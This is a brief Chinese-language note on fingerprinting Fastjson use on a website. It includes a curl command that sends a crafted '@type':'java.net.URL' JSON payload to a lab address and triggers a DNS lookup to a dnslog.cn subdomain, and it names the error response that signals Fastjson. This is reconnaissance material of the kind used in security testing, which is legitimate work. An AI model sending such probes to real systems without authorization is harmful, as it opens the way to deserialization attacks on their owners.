Fastjson的探测方式
模拟使用fastjson的网站 http://192.168.88.111:8090/
方式一
命令行
curl http://192.168.88.111:8090/ -H "Content-Type: application/json" --data '{
{"@type":"java.net.URL","val":"cegkgu.dnslog.cn"}:0'
识别特征:(出现则使用了Fastjson)
"status":500, "error":"Internal Server Error"